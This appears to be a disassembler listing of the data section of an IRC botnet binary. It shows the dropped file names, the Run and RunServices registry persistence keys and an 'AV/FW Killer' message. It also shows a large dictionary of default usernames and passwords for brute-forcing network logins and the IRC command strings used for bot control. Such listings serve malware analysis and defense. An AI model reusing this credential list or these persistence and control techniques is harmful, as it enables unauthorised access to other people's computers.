Str db 'nlzhxmpyrjsyle.exe',0 ; DATA XREF: WinMain(x,x,x,x)+143�o
; WinMain(x,x,x,x)+167�w ...
align 10h
; char aWinnt_bat[]
aWinnt_bat db 'winnt.bat',0 ; DATA XREF: sub_412694+3D�o
align 4
aWindowsService db 'Windows Service Agent',0 ; DATA XREF: sub_401000+E�o
align 4
asc_43F134: ; DATA XREF: sub_40B0D7+12�o
unicode 0, <->,0
aWinsys_dat db 'winsys.dat',0
align 4
aXI db '-x+i',0 ; DATA XREF: sub_401CC7+7FEE�o
align 4
; char a2[]
a2 db '#2',0 ; DATA XREF: sub_401CC7+1D36�o
; sub_401CC7+3039�o ...
align 10h
; char a2_0[]
a2_0 db '#2',0 ; DATA XREF: sub_401CC7+449A�o
align 4
; char a2_1[]
a2_1 db '#2',0 ; DATA XREF: sub_401CC7+40BE�o
; sub_401CC7+4210�o
align 4
off_43F158 dd offset a@admin ; DATA XREF: sub_401CC7:loc_409BBD�o
; "*@admin"
off_43F15C dd offset aMircV6_16Khale ; DATA XREF: sub_401CC7+8AE�r
; sub_401CC7+7F12�o
; "mIRC v6.16 Khaled Mardam-Bey"
dd offset aMircV6_17Khale ; "mIRC v6.17 Khaled Mardam-Bey"
dd offset aMircV6_20Khale ; "mIRC v6.20 Khaled Mardam-Bey"
dd offset aMircV6_21Khale ; "mIRC v6.21 Khaled Mardam-Bey"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .data:0043F054�o
; .data:0043F064�o
align 4
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: .data:0043F05C�o
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_41AD5D+28�o
; sub_41B081+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_41AD5D+D4�o
; sub_41B081+D4�o
align 4
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
dd 0
dd offset dword_4E2F90
dd offset aAdministrato_1 ; "administrator"
dd offset aAdministrado_0 ; "administrador"
dd offset aAdministrate_0 ; "administrateur"
dd offset aAdministrat_0 ; "administrat"
dd offset aAdmins_0 ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_1 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1_0 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003_0 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_1 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault_0 ; "default"
dd offset aSystem ; "system"
dd offset aServer_6 ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_4 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin_2 ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase_0 ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2_0 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa_0 ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle_0 ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_1 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent_0 ; "student"
dd offset aTeacher_0 ; "teacher"
dd offset aStaff_0 ; "staff"
dd 0
dword_43F494 dd 10h ; DATA XREF: sub_401CC7+AE4�r
; sub_401CC7+B10�r ...
a@admin db '*@admin',0 ; DATA XREF: .data:off_43F158�o
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_43F15C�o
align 10h
aMircV6_17Khale db 'mIRC v6.17 Khaled Mardam-Bey',0 ; DATA XREF: .data:0043F160�o
align 10h
aMircV6_20Khale db 'mIRC v6.20 Khaled Mardam-Bey',0 ; DATA XREF: .data:0043F164�o
align 10h
aMircV6_21Khale db 'mIRC v6.21 Khaled Mardam-Bey',0 ; DATA XREF: .data:0043F168�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:0043F214�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: .data:0043F218�o
align 10h
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0043F21C�o
align 10h
aAdministrat db 'administrat',0 ; DATA XREF: .data:0043F220�o
aAdmins db 'admins',0 ; DATA XREF: .data:0043F224�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .data:0043F228�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0043F22C�o
align 4
aRoot db 'root',0 ; DATA XREF: .data:0043F230�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0043F234�o
align 4
aOwner db 'owner',0 ; DATA XREF: .data:0043F238�o
align 10h
aStudent db 'student',0 ; DATA XREF: .data:0043F23C�o
aTeacher db 'teacher',0 ; DATA XREF: .data:0043F240�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0043F244�o
align 4
aGuest_0 db 'guest',0 ; DATA XREF: .data:0043F248�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0043F24C�o
aDatabase db 'database',0 ; DATA XREF: .data:0043F250�o
align 4
aDba db 'dba',0 ; DATA XREF: .data:0043F254�o
aOracle db 'oracle',0 ; DATA XREF: .data:0043F258�o
align 4
aDb2 db 'db2',0 ; DATA XREF: .data:0043F25C�o
aAdministrato_1 db 'administrator',0 ; DATA XREF: .data:0043F268�o
align 4
aAdministrado_0 db 'administrador',0 ; DATA XREF: .data:0043F26C�o
align 4
aAdministrate_0 db 'administrateur',0 ; DATA XREF: .data:0043F270�o
align 4
aAdministrat_0 db 'administrat',0 ; DATA XREF: .data:0043F274�o
aAdmins_0 db 'admins',0 ; DATA XREF: .data:0043F278�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: .data:0043F27C�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0043F280�o
aPassword1 db 'password1',0 ; DATA XREF: .data:0043F284�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0043F288�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: .data:0043F28C�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0043F290�o
align 4
aPass_1 db 'pass',0 ; DATA XREF: .data:0043F294�o
align 4
aPwd db 'pwd',0 ; DATA XREF: .data:0043F298�o
a007 db '007',0 ; DATA XREF: .data:0043F29C�o
a1_0: ; DATA XREF: .data:0043F2A0�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: .data:0043F2A4�o
align 4
a123 db '123',0 ; DATA XREF: .data:0043F2A8�o
a1234 db '1234',0 ; DATA XREF: .data:0043F2AC�o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0043F2B0�o
align 10h
a123456 db '123456',0 ; DATA XREF: .data:0043F2B4�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:0043F2B8�o
a12345678 db '12345678',0 ; DATA XREF: .data:0043F2BC�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:0043F2C0�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:0043F2C4�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:0043F2C8�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:0043F2CC�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:0043F2D0�o
align 4
a2003_0 db '2003',0 ; DATA XREF: .data:0043F2D4�o
align 4
a2004 db '2004',0 ; DATA XREF: .data:0043F2D8�o
align 4
aTest db 'test',0 ; DATA XREF: .data:0043F2DC�o
align 4
aGuest_1 db 'guest',0 ; DATA XREF: .data:0043F2E0�o
align 4
aNone db 'none',0 ; DATA XREF: .data:0043F2E4�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0043F2E8�o
align 4
aUnix db 'unix',0 ; DATA XREF: .data:0043F2EC�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0043F2F0�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .data:0043F2F4�o
align 4
aDefault_0 db 'default',0 ; DATA XREF: .data:0043F2F8�o
aSystem db 'system',0 ; DATA XREF: .data:0043F2FC�o
align 4
aServer_6 db 'server',0 ; DATA XREF: .data:0043F300�o
align 10h
aRoot_0 db 'root',0 ; DATA XREF: .data:0043F304�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:0043F308�o
align 10h
aQwerty db 'qwerty',0 ; DATA XREF: .data:0043F30C�o
align 4
aMail db 'mail',0 ; DATA XREF: .data:0043F310�o
align 10h
aOutlook db 'outlook',0 ; DATA XREF: .data:0043F314�o
aWeb db 'web',0 ; DATA XREF: .data:0043F318�o
aWww db 'www',0 ; DATA XREF: .data:0043F31C�o
aInternet db 'internet',0 ; DATA XREF: .data:0043F320�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0043F324�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:0043F328�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0043F32C�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0043F330�o
align 4
aUser_4 db 'user',0 ; DATA XREF: .data:0043F334�o
align 10h
aOem db 'oem',0 ; DATA XREF: .data:0043F338�o
aOemuser db 'oemuser',0 ; DATA XREF: .data:0043F33C�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0043F340�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0043F344�o
aWin98 db 'win98',0 ; DATA XREF: .data:0043F348�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:0043F34C�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .data:0043F350�o
align 4
aWinnt db 'winnt',0 ; DATA XREF: .data:0043F354�o
align 10h
aWin2000 db 'win2000',0 ; DATA XREF: .data:0043F358�o
aQaz db 'qaz',0 ; DATA XREF: .data:0043F35C�o
aAsd db 'asd',0 ; DATA XREF: .data:0043F360�o
aZxc db 'zxc',0 ; DATA XREF: .data:0043F364�o
aQwe db 'qwe',0 ; DATA XREF: .data:0043F368�o
aBob db 'bob',0 ; DATA XREF: .data:0043F36C�o
aJen db 'jen',0 ; DATA XREF: .data:0043F370�o
aJoe db 'joe',0 ; DATA XREF: .data:0043F374�o
aFred db 'fred',0 ; DATA XREF: .data:0043F378�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0043F37C�o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0043F380�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:0043F384�o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:0043F388�o
align 4
aLuke db 'luke',0 ; DATA XREF: .data:0043F38C�o
align 4
aSam db 'sam',0 ; DATA XREF: .data:0043F390�o
aSue db 'sue',0 ; DATA XREF: .data:0043F394�o
aSusan db 'susan',0 ; DATA XREF: .data:0043F398�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: .data:0043F39C�o
align 4
aBrian db 'brian',0 ; DATA XREF: .data:0043F3A0�o
align 4
aLee db 'lee',0 ; DATA XREF: .data:0043F3A4�o
aNeil db 'neil',0 ; DATA XREF: .data:0043F3A8�o
align 10h
aIan db 'ian',0 ; DATA XREF: .data:0043F3AC�o
aChris db 'chris',0 ; DATA XREF: .data:0043F3B0�o
align 4
aEric db 'eric',0 ; DATA XREF: .data:0043F3B4�o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:0043F3B8�o
align 4
aKate db 'kate',0 ; DATA XREF: .data:0043F3BC�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: .data:0043F3C0�o
aKatie db 'katie',0 ; DATA XREF: .data:0043F3C4�o
align 10h
aMary db 'mary',0 ; DATA XREF: .data:0043F3C8�o
align 4
aLogin_2 db 'login',0 ; DATA XREF: .data:0043F3CC�o
align 10h
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0043F3D0�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .data:0043F3D4�o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:0043F3D8�o
align 10h
aExchange db 'exchange',0 ; DATA XREF: .data:0043F3DC�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .data:0043F3E0�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:0043F3E4�o
align 4
aSlut db 'slut',0 ; DATA XREF: .data:0043F3E8�o
align 4
aSex db 'sex',0 ; DATA XREF: .data:0043F3EC�o
aGod db 'god',0 ; DATA XREF: .data:0043F3F0�o
aHell db 'hell',0 ; DATA XREF: .data:0043F3F4�o
align 4
aHello db 'hello',0 ; DATA XREF: .data:0043F3F8�o
align 4
aDomain db 'domain',0 ; DATA XREF: .data:0043F3FC�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:0043F400�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:0043F404�o
align 10h
aDatabase_0 db 'database',0 ; DATA XREF: .data:0043F408�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:0043F40C�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:0043F410�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:0043F414�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0043F418�o
align 4
aData db 'data',0 ; DATA XREF: .data:0043F41C�o
align 10h
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:0043F420�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:0043F424�o
aDb2_0 db 'db2',0 ; DATA XREF: .data:0043F428�o
aDb1234 db 'db1234',0 ; DATA XREF: .data:0043F42C�o
align 4
aSa_0 db 'sa',0 ; DATA XREF: .data:0043F430�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:0043F434�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0043F438�o
align 10h
aOrainstall db 'orainstall',0 ; DATA XREF: .data:0043F43C�o
align 4
aOracle_0 db 'oracle',0 ; DATA XREF: .data:0043F440�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:0043F444�o
aCisco db 'cisco',0 ; DATA XREF: .data:0043F448�o
align 10h
aDell db 'dell',0 ; DATA XREF: .data:0043F44C�o
align 4
aCompaq db 'compaq',0 ; DATA XREF: .data:0043F450�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: .data:0043F454�o
aHp db 'hp',0 ; DATA XREF: .data:0043F458�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:0043F45C�o
align 4
aXp_1 db 'xp',0 ; DATA XREF: .data:0043F460�o
align 4
aControl db 'control',0 ; DATA XREF: .data:0043F464�o
aOffice db 'office',0 ; DATA XREF: .data:0043F468�o
align 4
aBlank db 'blank',0 ; DATA XREF: .data:0043F46C�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: .data:0043F470�o
aMain db 'main',0 ; DATA XREF: .data:0043F474�o
align 10h
aLan db 'lan',0 ; DATA XREF: .data:0043F478�o
aInternet_0 db 'internet',0 ; DATA XREF: .data:0043F47C�o
align 10h
aIntranet db 'intranet',0 ; DATA XREF: .data:0043F480�o
align 4
aStudent_0 db 'student',0 ; DATA XREF: .data:0043F484�o
aTeacher_0 db 'teacher',0 ; DATA XREF: .data:0043F488�o
aStaff_0 db 'staff',0 ; DATA XREF: .data:0043F48C�o
align 4
; char aSS[]
aSS db '%s%s',0 ; DATA XREF: WinMain(x,x,x,x)+10D�o
align 4
; char Format[]
Format db '%s\%s',0 ; DATA XREF: WinMain(x,x,x,x)+189�o
align 4
; char aSDS[]
aSDS db '%s %d "%s"',0 ; DATA XREF: WinMain(x,x,x,x)+28F�o
align 10h
; char asc_43FA60[]
asc_43FA60 db '-' ; DATA XREF: WinMain(x,x,x,x)+364�o
db 3, 34h, 2
dd 6E69616Dh, 202D0203h, 20746F42h, 72617473h, 2E646574h
dd 0
; char asc_43FA7C[]
asc_43FA7C db '-' ; DATA XREF: WinMain(x,x,x,x)+3A2�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 10h
; char asc_43FAA0[]
asc_43FAA0 db '-' ; DATA XREF: WinMain(x,x,x,x)+3F3�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 10h
; char asc_43FAE0[]
asc_43FAE0 db '-' ; DATA XREF: WinMain(x,x,x,x)+420�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aServerRunningO db '- Server running on Port: 113.',0
align 4
; char asc_43FB0C[]
asc_43FB0C db '-' ; DATA XREF: WinMain(x,x,x,x)+46B�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aFailedToStartS db '- Failed to start server, error: <%d>.',0
align 10h
; char asc_43FB40[]
asc_43FB40 db '-' ; DATA XREF: sub_4019E7+F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aConnectedToS_ db 'Connected to %s.',0
align 10h
; char aPassS[]
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401B4F+35�o
align 4
; char aNickSUserS00S[]
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_401B4F+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
; char SubStr[]
SubStr db ' :',0 ; DATA XREF: sub_401CC7+86�o
align 4
; char Delim[]
Delim: ; DATA XREF: sub_401CC7+AE�o
unicode 0, < >,0
; char asc_43FB90[]
asc_43FB90: ; DATA XREF: sub_401CC7:loc_401D92�o
unicode 0, < >,0
; char asc_43FB94[]
asc_43FB94: ; DATA XREF: sub_401CC7+191�o
unicode 0, <!>,0
; char aPing[]
aPing db 'PING',0 ; DATA XREF: sub_401CC7+1A0�o
align 10h
; char aPongS[]
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+1BA�o
align 4
; char aJoinSS[]
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+1DB�o
align 4
; char a001[]
a001 db '001',0 ; DATA XREF: sub_401CC7+1F7�o
; char a005[]
a005 db '005',0 ; DATA XREF: sub_401CC7+20C�o
; char aUserhostS[]
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7FDE�o
align 4
; char aModeSS_0[]
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7FF6�o
align 4
; char aJoinSS_4[]
aJoinSS_4 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+800C�o
align 4
; char a302_0[]
a302_0 db '302',0 ; DATA XREF: sub_401CC7+221�o
; char a[]
a@: ; DATA XREF: sub_401CC7+231�o
unicode 0, <@>,0
; char a433_0[]
a433_0 db '433',0 ; DATA XREF: sub_401CC7+259�o
; char aNickS[]
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+284�o
align 4
; char aKick[]
aKick db 'KICK',0 ; DATA XREF: sub_401CC7+2DB�o
align 4
; char asc_43FC14[]
asc_43FC14 db '-' ; DATA XREF: sub_401CC7+34C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedOut db 'User %s logged out.',0
; char aNoticeSS[]
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+368�o
; char aJoinSS_0[]
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+3AE�o
align 4
; char aNick[]
aNick db 'NICK',0 ; DATA XREF: sub_401CC7+3C7�o
align 4
; char aSS_1[]
aSS_1 db ':%s%s',0 ; DATA XREF: sub_401CC7+4F5�o
align 4
; char aPart[]
aPart db 'PART',0 ; DATA XREF: sub_401CC7+51D�o
align 4
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_401CC7+52E�o
align 4
; char asc_43FC74[]
asc_43FC74 db '-' ; DATA XREF: sub_401CC7+5C4�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_0 db 'User: %s logged out.',0
align 4
; char aPart_0[]
aPart_0 db 'PART',0 ; DATA XREF: sub_401CC7+5E1�o
align 10h
aNoticeSS_0 db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+605�o
; char a353[]
a353 db '353',0 ; DATA XREF: sub_401CC7+56C�o
; char asc_43FCB4[]
asc_43FCB4 db '-' ; DATA XREF: sub_401CC7+59D�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChannelS db 'Joined channel: %s.',0
; char aPrivmsg[]
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_401CC7+610�o
; char aNotice[]
aNotice db 'NOTICE',0 ; DATA XREF: sub_401CC7+621�o
align 4
; char a332[]
a332 db '332',0 ; DATA XREF: sub_401CC7+632�o
; char aPrivmsg_0[]
aPrivmsg_0 db 'PRIVMSG',0 ; DATA XREF: sub_401CC7+653�o
; char aNotice_0[]
aNotice_0 db 'NOTICE',0 ; DATA XREF: sub_401CC7+668�o
align 4
; char aNotice_1[]
aNotice_1 db 'NOTICE',0 ; DATA XREF: sub_401CC7+7E3�o
align 10h
; char asc_43FD00[]
asc_43FD00: ; DATA XREF: sub_401CC7+808�o
unicode 0, <#>,0
; char dword_43FD04
dword_43FD04 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_401CC7+890�o
dword_43FD10 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_401CC7+8BB�o
dd 0D017325h, 0Ah
; char dword_43FD2C
dword_43FD2C dd 4E495001h, 47h ; DATA XREF: sub_401CC7+8C6�o
dword_43FD34 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_401CC7+8F7�o
dd 0A0Dh
; char dword_43FD4C
dword_43FD4C dd 43434401h, 0 ; DATA XREF: sub_401CC7+6AF�o
; char aSend[]
aSend db 'SEND',0 ; DATA XREF: sub_401CC7+6CD�o
align 4
; char aS[]
aS db '%s',0 ; DATA XREF: sub_401CC7+6FA�o
align 10h
; char aS_0[]
aS_0 db '%s',0 ; DATA XREF: sub_401CC7+715�o
align 4
; char asc_43FD64[]
asc_43FD64 db '-' ; DATA XREF: sub_401CC7+776�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
unk_43FD94 db 2Dh ; - ; DATA XREF: sub_401CC7+908�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToStartT db '- Failed to start transfer thread, error: <%d>.',0
align 10h
; char asc_43FDD0[]
asc_43FDD0 db '-' ; DATA XREF: sub_401CC7+920�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 4
; char aChat[]
aChat db 'CHAT',0 ; DATA XREF: sub_401CC7+940�o
align 4
; char aS_1[]
aS_1 db '%s',0 ; DATA XREF: sub_401CC7+97D�o
align 10h
; char asc_43FE20[]
asc_43FE20 db '-' ; DATA XREF: sub_401CC7+9D7�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 10h
unk_43FE40 db 2Dh ; - ; DATA XREF: sub_401CC7+A46�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToStartC db '- Failed to start chat thread, error: <%d>.',0
align 4
unk_43FE78 db 2Dh ; - ; DATA XREF: sub_401CC7+A57�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 4
unk_43FEA8 db 2Dh ; - ; DATA XREF: sub_401CC7+A68�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 4
; char aLogin[]
aLogin db 'login',0 ; DATA XREF: sub_401CC7+A8B�o
align 4
; char asc_43FEE4[]
asc_43FEE4: ; DATA XREF: sub_401CC7+AA3�o
unicode 0, <l>,0
; char asc_43FEE8[]
asc_43FEE8: ; DATA XREF: sub_401CC7+7E75�o
unicode 0, <!>,0
; char asc_43FEEC[]
asc_43FEEC: ; DATA XREF: sub_401CC7+7E93�o
unicode 0, <~>,0
; char aNoticeSPassAut[]
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7EC3�o
align 4
; char aNoticeSYourAtt[]
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7EDA�o
align 4
unk_43FF44 db 2Dh ; - ; DATA XREF: sub_401CC7+7EEC�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedPassAuth db '*Failed pass auth by: (%s!%s).',0
align 10h
; char aNoticeSHostAut[]
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7F2A�o
align 4
; char aNoticeSYourA_0[]
aNoticeSYourA_0 db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7F41�o
align 4
unk_43FFC4 db 2Dh ; - ; DATA XREF: sub_401CC7+7F53�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedHostAuth db '*Failed host auth by: (%s!%s).',0
align 10h
unk_43FFF0 db 2Dh ; - ; DATA XREF: sub_401CC7+7FB4�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
